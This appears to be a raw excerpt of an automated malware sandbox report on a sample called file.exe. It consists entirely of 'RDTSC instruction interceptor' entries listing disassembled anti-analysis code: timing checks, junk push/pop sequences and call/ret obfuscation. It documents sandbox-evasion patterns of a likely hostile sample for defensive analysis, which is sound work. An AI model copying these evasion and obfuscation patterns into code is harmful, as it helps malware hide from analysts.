              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C42E second address: 135C45F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA188F2DB8h 0x00000008 jmp 00007FEA188F2DBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FEA188F2DC2h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C45F second address: 135C463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C463 second address: 135C481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEA188F2DC4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C481 second address: 135C487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C783 second address: 135C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C78B second address: 135C7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FEA188A9BD6h 0x0000000c popad 0x0000000d jo 00007FEA188A9BE2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135C7A0 second address: 135C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FE66 second address: 135FE7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FEA188A9BD6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FED3 second address: 135FED9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FED9 second address: 135FEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13601F5 second address: 13601F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136039D second address: 13603A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136048F second address: 1360493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360493 second address: 1360497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360A5D second address: 1360A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360A61 second address: 1360A67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B8C second address: 1360B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360CD1 second address: 1360CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360CDB second address: 1360CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360CDF second address: 1360CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FEA188A9BD8h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361103 second address: 1361107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1361107 second address: 1361124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362825 second address: 136282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13651D2 second address: 13651E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DDF second address: 1368DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DE3 second address: 1368DED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DED second address: 1368E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DBAh 0x00000008 jbe 00007FEA188F2DB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A459 second address: 136A481 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnc 00007FEA188A9BD6h 0x00000015 popad 0x00000016 jmp 00007FEA188A9BE2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AA9E second address: 136AAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AAA4 second address: 136AAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BB1B second address: 136BB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9CD second address: 136CA37 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA188A9BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FEA188A9BE9h 0x00000012 add ebx, dword ptr [ebp+122D293Ch] 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b jmp 00007FEA188A9BDBh 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FEA188A9BD8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop eax 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D9C4 second address: 136D9C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136E803 second address: 136E826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BE5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708D7 second address: 13708DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC63 second address: 136BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC49 second address: 136AC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708DB second address: 13708F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DAEC second address: 136DAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC4D second address: 136AC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708F3 second address: 13708F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136E97B second address: 136E9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push esi 0x0000000c jnp 00007FEA188A9BDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FA98 second address: 136FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188F2DB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DAF2 second address: 136DB04 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC53 second address: 136AC59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708F7 second address: 137091E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnl 00007FEA188A9BD6h 0x00000014 jmp 00007FEA188A9BDEh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAAC second address: 136FAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DB04 second address: 136DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137091E second address: 1370922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136E9A2 second address: 136EA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007FEA188A9BD8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 or ebx, dword ptr [ebp+122D2920h] 0x00000026 push dword ptr fs:[00000000h] 0x0000002d jnl 00007FEA188A9BDCh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov dword ptr [ebp+122D2C54h], edx 0x00000040 mov eax, dword ptr [ebp+122D06A5h] 0x00000046 mov dword ptr [ebp+122D37A4h], ecx 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FEA188A9BD8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 mov dword ptr [ebp+1247E6D6h], edx 0x0000006e pushad 0x0000006f mov ebx, edx 0x00000071 mov edx, 49357673h 0x00000076 popad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007FEA188A9BE5h 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAB1 second address: 136FAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DB08 second address: 136DB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAB7 second address: 136FABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371866 second address: 137186C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DBC7 second address: 136DBE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137186C second address: 1371870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DBE5 second address: 136DBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373705 second address: 1373786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FEA188A9BD8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 call 00007FEA188A9BE1h 0x00000029 mov di, E112h 0x0000002d pop ebx 0x0000002e push 00000000h 0x00000030 movzx ebx, cx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FEA188A9BD8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f sub dword ptr [ebp+1245CC5Bh], esi 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jne 00007FEA188A9BD6h 0x0000005f push ebx 0x00000060 pop ebx 0x00000061 popad 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373786 second address: 137378D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13757FC second address: 1375897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FEA188A9BD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2CD9h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FEA188A9BD8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 add dword ptr [ebp+1247D9BAh], edx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FEA188A9BD8h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 jmp 00007FEA188A9BE6h 0x00000058 jmp 00007FEA188A9BE5h 0x0000005d mov bl, dh 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 js 00007FEA188A9BDCh 0x00000068 jbe 00007FEA188A9BD6h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375897 second address: 13758BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FEA188F2DB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FEA188F2DC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13767BC second address: 1376815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FEA188A9BD8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bx, 2E3Eh 0x00000028 mov dword ptr [ebp+122D2BB9h], esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D2AD4h] 0x00000038 xchg eax, esi 0x00000039 push edi 0x0000003a jno 00007FEA188A9BDCh 0x00000040 pop edi 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jnp 00007FEA188A9BD6h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373901 second address: 1373916 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DBCh 0x00000008 ja 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13748C2 second address: 137495C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FEA188A9BDBh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D240Bh], eax 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov di, ax 0x00000025 mov eax, dword ptr [ebp+122D07DDh] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FEA188A9BD8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D280Dh] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FEA188A9BD8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 pushad 0x00000068 push edx 0x00000069 pop ebx 0x0000006a add esi, 5868AA71h 0x00000070 popad 0x00000071 jmp 00007FEA188A9BDEh 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jng 00007FEA188A9BD8h 0x0000007f push edi 0x00000080 pop edi 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137495C second address: 1374962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13739AD second address: 13739B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377695 second address: 13776A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13776A4 second address: 1377743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FEA188A9BE4h 0x0000000c nop 0x0000000d or ebx, dword ptr [ebp+122D2838h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FEA188A9BD8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f jc 00007FEA188A9BE5h 0x00000035 jmp 00007FEA188A9BDFh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FEA188A9BD8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jmp 00007FEA188A9BE8h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f push edx 0x00000060 pop edx 0x00000061 pop esi 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375ABB second address: 1375AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378733 second address: 1378738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378738 second address: 137873D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A48 second address: 1376A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A4E second address: 1376A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779BB second address: 13779BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137972C second address: 13797E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007FEA188F2DDDh 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D28C0h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FEA188F2DB8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jng 00007FEA188F2DC4h 0x00000039 pushad 0x0000003a jg 00007FEA188F2DB6h 0x00000040 mov edi, dword ptr [ebp+122D2A04h] 0x00000046 popad 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FEA188F2DB8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000017h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 movzx ebx, cx 0x00000066 xchg eax, esi 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a jmp 00007FEA188F2DBFh 0x0000006f jng 00007FEA188F2DB6h 0x00000075 popad 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13797E8 second address: 13797EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D001 second address: 137D005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
